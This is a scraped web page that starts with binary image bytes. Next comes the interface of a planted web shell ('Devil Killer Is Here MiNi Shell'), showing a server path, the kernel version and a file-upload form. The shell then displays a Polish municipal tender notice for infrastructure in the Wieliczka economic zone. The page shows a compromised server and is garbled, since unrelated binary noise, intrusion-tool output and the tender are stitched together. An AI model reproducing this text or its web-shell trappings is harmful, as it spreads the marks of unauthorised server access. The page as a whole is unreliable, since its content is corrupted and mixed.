JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150109/3173-N-2015.html

<p class="kh_header"><b>Wieliczka: Utworzenie Wielickiej Strefy Aktywności Gospodarczej - Etap II: Uzbrojenie terenu dla Wielickiej Strefy Aktywności Gospodarczej w formule zaprojektuj i wybuduj</b><br>
<b>Numer ogłoszenia: 3173 - 2015; data zamieszczenia: 09.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wieliczka , ul. Powstania Warszawskiego 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 263 41 00, faks 12 278 68 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie Wielickiej Strefy Aktywności Gospodarczej - Etap II: Uzbrojenie terenu dla Wielickiej Strefy Aktywności Gospodarczej w formule zaprojektuj i wybuduj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1 Ogólna charakterystyka przedsięwzięcia:

Przedmiotem zamówienia jest: Wielicka Strefa Aktywności Gospodarczej realizowana w systemie zaprojektuj i wybuduj. Zakres robót objętych zamówieniem obejmuje zaprojektowanie i wybudowanie:
- dróg wewnętrznych o długości 2516,0 m, szerokości 7m (pas ruchu 2 x 3,5m wraz z dodatkowymi poszerzeniami na łukach oraz ciąg pieszo-jezdny o szer. 3,5 m). Przy drodze powiatowej w granicach strefy zaplanowano utwardzenie poboczy w ramach modernizacji 800 m drogi, odwodnienie oraz oświetlenie uliczne (kablowe),
- instalacji wodno-kanalizacyjnych:
a) sieć wodociągowa z rur PE o dł. 3280,00 m oraz przyłącza wodociągowe do strefy o dł. 1300,00 m,
b) sieć kanalizacji sanitarnej z rur z tworzyw sztucznych o dł. 3820,00 m oraz przyłącza kanalizacyjne do strefy o dł. 280,00 m,
c) sieć kanalizacji deszczowej z rur z tworzyw sztucznych o dł. 3950,00 m,
d) zbiornik retencyjny (należy zaprojektować zgodnie z obliczeniami wynikającymi z retencji terenu, w dowolnej konstrukcji). Proponuje się aby zbiornik retencyjny zbudować z naturalnego gruntu porośniętego rodzima roślinnością, jako zbiornik suchy, retencyjno-chłonny z możliwym kontrolowanym odpływem do rzeki Drwina.

UWAGA! 
Podane długości sieci, jak i inne parametry sieci oraz zastosowane materiały są tylko orientacyjne, a ich zmiana może nastąpić po uzyskaniu odpowiednich warunków technicznych oraz zgód i nie będzie skutkowała zmianą ceny oferty.

3.2 Zakres przedmiotu zamówienia obejmuje:
-  zaprojektowanie i wykonanie wewnętrznej infrastruktury technicznej Wielickiej Strefy Aktywności Gospodarczej składającej się z instalacji wodno - kanalizacyjnych (kanalizacja deszczowa, kanalizacja sanitarna, instalacja wodociągowa, zbiornik retencyjny) oraz infrastruktury drogowej wraz z oświetleniem ulicznym,
- zaprojektowanie i wykonanie zewnętrznej infrastruktury technicznej Wielickiej Strefy Aktywności Gospodarczej składającej się z przyłączy wodociągowych i kanalizacyjnych oraz wystąpienie o warunki techniczne do ZE.

3.3 Na zakres przedmiotu zamówienia składa się:
3.3.1 Sporządzenie projektów budowlanych w zakresie niezbędnym do uzyskania pozwolenia na budowę
z uzyskaniem wynikających z przepisów: uzgodnień, opinii, pozwoleń i zgód - przy zadośćuczynieniu wymaganiom zawartym w ustawie z 7 lipca 1994r. - Prawo budowlane oraz w Rozporządzeniu Ministra Infrastruktury z 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego 

3.3.2 Sporządzenie projektów wykonawczych oraz specyfikacji technicznych wykonania
i odbioru robót według wymagań zawartych w Rozporządzeniu Ministra Infrastruktury z 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego, sporządzenie przedmiarów robót oraz kosztorysów inwestorskich,

3.3.3 Wykonanie robót budowlanych na podstawie sporządzonych projektów i specyfikacji technicznych
wykonania i odbioru robót wraz ze sprawowaniem nadzoru autorskiego nad robotami budowlanymi wykonywanymi na podstawie opracowanej dokumentacji projektowej w zakresie wynikającym z ustawy
Prawo budowlane.

3.3.4 Przeprowadzenie wymaganych prób i badań, uzyskanie odbiorów robót i przygotowanie dokumentów związanych z oddaniem do użytkowania wybudowanych obiektów oraz z uzyskaniem decyzji pozwolenia na użytkowanie jeżeli takie będą występować w decyzji pozwoleniu na budowę lub równoważnych zgłoszeń do użytkowania.

3.4 Szczegółowe właściwości funkcjonalno-użytkowe wyrażone we wskaźnikach powierzchniowo-kubaturowych.
 
Sieć 
Jednostka miary, długość, ilość
szerokość
Drogi budowa
2516,00 m
2x 3,5 m
Ciągi pieszo-jezdne
2516,00 m
3,5 m
Modernizacja pasa drogowego
800,00 m

Oświetlenie uliczne wraz ze studniami i okablowaniem zasilającym
70,00 kompletów

Sieć wodna wewnętrzna SAG
3280,00 m

Sieć wodna przyłącza
1300,00 m

Sieć kanaliz. sanitarnej wewnętrzna SAG
3820,00 m

Sieć kanalizacji sanitarnej przyłącza
280,00 m

Sieć kanalizacji deszczowej
3950,00 m

Przedstawione wartości w tabeli wyżej są wartościami przybliżonymi. W trakcie wykonywania projektu należy je zweryfikować i uaktualnić. 

Uwaga: Modernizacja 800,00 m pasa drogowego polega na utwardzeniu poboczy.

W ramach zamówienia do obowiązków Wykonawcy należy m.in.:

- Uzyskanie wszelkich, niezbędnych decyzji administracyjnych i uzgodnień wraz z pozwoleniem na budowę.
- Przygotowanie dokumentów dla oświadczenia o prawie dysponowania terenem w granicach pasa drogowego. 
- Opracowanie projektu budowlanego wraz ze wszystkimi wymaganiami prawem i przepisami uzgodnieniami i opiniami niezbędnymi do uzyskania pozwolenia na budowę wraz z uzyskaniem prawomocnej decyzji pozwolenia na budowę. Projekt budowlany powinien być sporządzony
w 5 egzemplarzach w wersji papierowej oraz w wersji elektronicznej (ZRID).
- Uzyskanie aktualnych map geodezyjnych, opinii geotechnicznych, hydrologicznych, opracowań środowiskowych.
- Opracowanie projektów wykonawczych wszystkich branż w co najmniej 3 egzemplarzach w wersji papierowej oraz w wersji elektronicznej.
- Opracowanie Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót na wszystkie elementy realizowanych robót w 2 egzemplarzach w wersji papierowej oraz w wersji elektronicznej. Podstawą opracowania będą Ogólne Specyfikacje Techniczne wydane przez GDDKiA.
- Opracowanie przedmiaru robót w 2 egzemplarzach w wersji papierowej oraz w wersji elektronicznej.
- Opracowanie kosztorysu inwestorskiego w 2 egzemplarzach w wersji papierowej oraz w wersji elektronicznej.
- Opracowanie harmonogramu realizacji zadania.
- Wykonanie inwentaryzacji zieleni oraz projektu gospodarki zielenią wraz z wyliczeniem ewentualnych opłat za usunięcie zieleni w pasach roboczych realizowanej inwestycji (2 egzemplarze)
- Opracowanie i przedłożenie do zatwierdzenia Zarządcom Ruchu projektów tymczasowej organizacji ruchu na czas trwania robót związanych z budową.
- Opracowanie wytycznych do planu BIOZ wraz z jego sporządzeniem - w 2 egzemplarzach w wersji papierowej oraz w wersji elektronicznej.
- Realizacja robót budowlanych w oparciu o zatwierdzone projekty wykonawcze po wytyczeniu robót przez uprawnionego geodetę Wykonawcy.
- Prowadzenie pomiarów kontrolnych zgodnie z wymogami SST wraz z pobieraniem próbek i dostarczaniem ich organom kontrolnym Zamawiającego.
- Przygotowanie harmonogramu kontrolnych badań odbiorowych w odniesieniu do harmonogramu realizacji badania - dla potrzeb nadzoru inwestorskiego.
- Prowadzenie obmiarów  ilości wykonywanych robót.
- Przygotowanie rozliczenia końcowego robót i sporządzenie operatu kolaudacyjnego.
- Sprawowanie nadzoru autorskiego nad realizowanymi robotami.
- Przekazanie zrealizowanych obiektów użytkownikowi wraz ze stosowną decyzją na użytkowanie.
- Sporządzenie inwentaryzacji geodezyjnej powykonawczej.
- Sporządzenie kompletnej dokumentacji powykonawczej w (3 egzemplarzach)

Realizacja powyższego zakresu inwestycji powinna być realizowana w oparciu o przepisy Prawa
Budowlanego przez Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy określony w SIWZ dla oferentów przez osoby o odpowiednich kwalifikacjach i doświadczeniu.

Szczegółowy zakres zadania należy wycenić i wykonać zgodnie z opisem przedmiotu zamówienia przedstawionym w Programie Funkcjonalno - Użytkowym oraz formularzem cenowym.

3.5 Do obowiązków Wykonawcy w ramach wynagrodzenia należy również:
1. Wskazanie działek, które Zamawiający musi wykupić w związku z realizacją projektu jeżeli taki będzie wymagany.
2. Protokolarne przejęcie terenu budowy od Zamawiającego.
3. Oznakowanie, organizację i zagospodarowanie placu budowy oraz zaplecza budowy.
4. Zabezpieczenie terenu budowy.
5. Zapewnienie tymczasowej organizacji ruchu.
6. Doprowadzenie mediów dla potrzeb budowy i ponoszenie kosztów ich zużycia.
7. Z Pełnomocnictwa Zamawiającego zawiadomić o rozpoczęciu robót organy wymienione w pozwoleniach i decyzjach, oraz o innych zmianach w trakcie trwania budowy z terminem wyprzedzenia wymaganym w tych dokumentach.
8. Wykonać dokumentację powykonawczą techniczną i geodezyjną zaklauzulowaną wraz z technicznymi protokołami odbiorów dotyczących wszystkich wykonanych robót.
9. Odtworzenie i przywrócenie terenów sąsiednich zajętych pod inwestycję do stanu pierwotnego, demontaż obiektów tymczasowych oraz uporządkowanie terenu.
10. Usuwanie w określonym przez Zamawiającego i Inspektora Nadzoru terminie wszelkich stwierdzonych nieprawidłowości.
11. Stałego nadzoru i obsługi geodezyjnej (w tym nadzoru archeologicznego), prowadzonej dla wszystkich robót przez podmiot posiadający w tym zakresie stosowne uprawnienia.
12.   Ubezpieczenie budowy i robót z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej oraz poniesienie pełnej odpowiedzialności z tego tytułu na cały okres realizacji zamówienia do wysokości minimum wartości brutto podpisanej umowy. Wykonawca jest zobowiązany dostarczyć kopię w/w ubezpieczenia  Zamawiającemu najpóźniej w dniu przekazania placu budowy. Jeżeli okres ubezpieczenia będzie krótszy niż termin realizacji zamówienia, wykonawca zobowiązany będzie do złożenia oświadczenia, że przedłuży to ubezpieczenie do końca realizacji zamówienia, a dokument  przedłużenia tego terminu lub wniesienia nowego ubezpieczenia dostarczy do Zamawiającego najpóźniej w dniu, w którym upływa termin pierwotnego ubezpieczenia.
13. Ochrony placu budowy w czasie realizacji zadania.
14. Wykonanie wszelkich wymaganych w trakcie realizacji i do odbioru badań laboratoryjnych potwierdzających uzyskanie dla badanych elementów parametrów technicznych wymaganych dokumentacją budowlaną i specyfikacjami technicznymi. Badania laboratoryjne muszą być wykonywane przez uprawnione laboratoria niezależne w stosunku do wykonawcy.
15. Wykonywanie poleceń i wskazówek Inspektora(ów) Nadzoru.
16. Organizowanie robót w uzgodnieniu z Inspektorami Nadzoru tak, aby z tego tytułu nie było zbędnych przerw w realizacji robót.
17. Rozpoczęcie prac niezwłocznie od dnia przekazania placu budowy.
18. Opracowania przed rozpoczęciem robót planu BIOZ, który zostanie przedstawiony do akceptacji Inspektorowi Nadzoru.
19. Przestrzeganie zasad BHP oraz planu BIOZ.
20. W dniu podpisania umowy przedłożyć Zamawiającemu dokumenty potwierdzające uprawnienia osób uczestniczących w realizacji zamówienia np. Kierownika budowy zgodnie z projektem umowy.
21. Najpóźniej na 14 dni przed terminem rozpoczęcia prac budowlanych Wykonawca dostarczy do Zamawiającego oświadczenie o konieczności lub braku konieczności zgłoszenia zamiaru rozpoczęcia robót budowlanych do właściwego inspektora pracy, zgodnie z §3 rozporządzenia Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003r. Nr 47, poz. 401).
22. Uczestniczenie w naradach z Zamawiającym Kierownika Budowy, który przedstawi zaawansowanie robót oraz sprawy, które wymagają rozstrzygnięcia przez Inspektora Nadzoru i przez Zamawiającego.
23. Dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót w terminach określonych przez Inspektora Nadzoru.
24. Zagospodarowanie powstałych podczas prowadzenia robót odpadów. Utylizację należy przeprowadzić zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21).
25. Wykonanie przedmiotu umowy z materiałów odpowiadających wymaganiom określonym w art. 10 ustawy Prawo budowlane.
26. Wykonanie na polecenie Inspektora Nadzoru prac niezbędnych ze względu na zagrożenie życia i bezpieczeństwa osób lub zabezpieczenie przed awarią, zawiadamiając o tym niezwłocznie Zamawiającego.
27. Uczestniczenie w przeglądach gwarancyjnych.
28. Usuwanie wad stwierdzonych w czasie przeglądów gwarancyjnych.
29. Uczestniczenie w radach budowy.

3.6 Za szkody wynikłe w czasie prowadzenia prac jak również za wszelkie zdarzenia powstałe z tej przyczyny odpowiedzialny będzie Wykonawca.

3.7 Podstawą wystawienia faktury końcowej będzie podpisany przez Zamawiającego, Inspektora Nadzoru i Wykonawcę oraz innych osób uczestniczących w odbiorze protokół odbioru końcowego robót.

3.8 Zgłaszając wykonane roboty do odbioru końcowego Wykonawca zobowiązany jest dołączyć, w szczególności:

1. wyniki wszystkich badań laboratoryjnych wykonywanych w czasie realizacji kontraktu,
2. deklaracje zgodności wbudowanych materiałów i urządzeń - zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 11 sierpnia 2004 r. w sprawie sposobów deklarowania zgodności wyrobów budowlanych oraz sposobu znakowania ich znakiem budowlanym (Dz. U. z 2004 r. Nr 198, poz. 2041 ze zm.),
3. udzieloną pisemną gwarancję na wykonane prace i wbudowane materiały,
4. dokumentację powykonawczą obiektu budowlanego wraz ze wszystkimi zmianami dokonanymi w toku budowy, potwierdzonymi przez Kierownika budowy, nadzór autorski i Inspektora nadzoru inwestorskiego,
5. wymagane dokumenty, protokoły i zaświadczenia z przeprowadzonych prób i sprawdzeń, instrukcje użytkowania, dokumenty gwarancyjne i inne dokumenty wymagane stosownymi przepisami,
6. protokoły odbiorów przyłączeń do sieci podpisane przez właścicieli tych sieci.

7. pozostałe dokumenty potwierdzające należyte wykonanie przedmiotu zamówienia  

Odbioru końcowego robót dokonuje Zamawiający w obecności Inspektora Nadzoru i Kierownika Budowy przy udziale innych osób wyznaczonych przez Zamawiającego i Wykonawcę w ciągu 14 dni od daty zgłoszenia ich do odbioru.

Zamawiający może podjąć decyzję o przerwaniu czynności odbioru końcowego, jeżeli w czasie tych czynności ujawniono istnienie wad, które uniemożliwiają użytkowanie przedmiotu umowy zgodnie z przeznaczeniem - aż do czasu usunięcia wad.

W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały  i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane,  konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ i jego załącznikach materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych w SIWZ i w załącznikach do SIWZ, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. Wszelkie zastosowane materiały muszą być zgodne z wymogami Ustawy o wyrobach budowlanych wg. której materiał nadaje się do stosowania przy wykonywaniu robót budowlanych, jeżeli jest oznakowany znakiem CE albo umieszczony jest przez Komisję Europejską w wykazie wyrobów mających niewielkie znaczenie dla zdrowia i bezpieczeństwa, dla których producent wydał deklarację zgodności z uznanymi regułami sztuki budowlanej albo jest oznakowany znakiem budowlanym (B).
Materiały nie odpowiadające wymaganiom jakościowym jak również przeterminowane nie mogą być stosowane.
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.

Wykonawca wykona przedmiot zamówienia z materiałów własnych.

3.9 CPV:
71300000-1 Usługi inżynieryjne w zakresie projektowania
45100000-8 Przygotowanie terenu pod budowę
45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej
45230000-8 Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych
i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu
45310000-3 Roboty instalacyjne elektryczne

3.10. Zamawiający przewiduje współfinansowanie zadania ze środków Unii Europejskiej w ramach programu Małopolskiego Regionalnego Programu Operacyjnego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 uPzp polegających na wykonaniu prac projektowych, oraz wykonaniu robót ziemnych, budowlanych i instalacyjnych do wysokości 20% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-1, 45.10.00.00-8, 45.20.00.00-9, 45.23.00.00-8, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1.Oferta musi być zabezpieczona wadium w wysokości: 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100).
Wadium musi być wniesione do dnia 26.01.2015 r. do godz. 09:50.
8.2.Wadium musi obejmować okres związania  ofertą.
8.3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1) w pieniądzu
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
3) w gwarancjach bankowych
4) w gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
Małopolski Bank Spółdzielczy w Wieliczce nr 10 8619 0006 0014 0200 4705 0079
Za termin wniesienia wadium uznaje się datę i godzinę wpływu środków na rachunek Zamawiającego.
Wadium wnoszone w innej formie niż w pieniądzu należy złożyć w oryginale w Wydziale Finansowo-Księgowym UMiG w Wieliczce, ul. Limanowskiego 32, pok. nr 2 w godz. 800 - 1600 lub w oryginale dołączyć do oferty.
Do oferty zaleca się dołączyć kopię polecenia przelewu, a w przypadku innej formy wadium, jeżeli nie zostanie złożone w oryginale w Wydz.Fin - Księgowym, należy przedłożyć oryginał wadium w ofercie, ale nie zaleca się łączyć trwale z pozostałymi dokumentami.
8.4.Zwrot wadium:
8.4.1. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem wykonawców, o których mowa w Art. 46 ust. 4a uPzp.
8.4.2. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
8.4.3. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert
8.5. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli:
8.5.1. Wykonawca w odpowiedzi na wezwanie, o którym mowa w Art. 26 ust. 3 uPzp z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5, lub informacji o tym, ze nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8.5.2. Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w  ofercie
- nie wniósł zabezpieczenia należytego wykonania umowy
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
8.6. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 8.4.1. Jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
8.7. Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8.8. Zamawiający dopuszcza możliwość zaliczenia wadium na poczet zabezpieczenia należytego wykonania umowy przez wykonawcę, którego oferta została uznana za najkorzystniejszą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na budowie lub/i przebudowie lub/i modernizacji lub/i remoncie drogi o nawierzchni asfaltowej wraz z odwodnieniem o wartości brutto nie mniejszej niż 800 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy dysponują:
- co najmniej jedną osobą posiadającą uprawnienia budowlane* do projektowania w specjalności drogowej. Osoba ta będzie pełniła funkcję projektanta w branży  drogowej.
- co najmniej jedną osobą posiadającą uprawnienia budowlane* do kierowania robotami budowlanymi w specjalności drogowej. Osoba ta będzie pełniła funkcję kierownika robót w branży  drogowej.
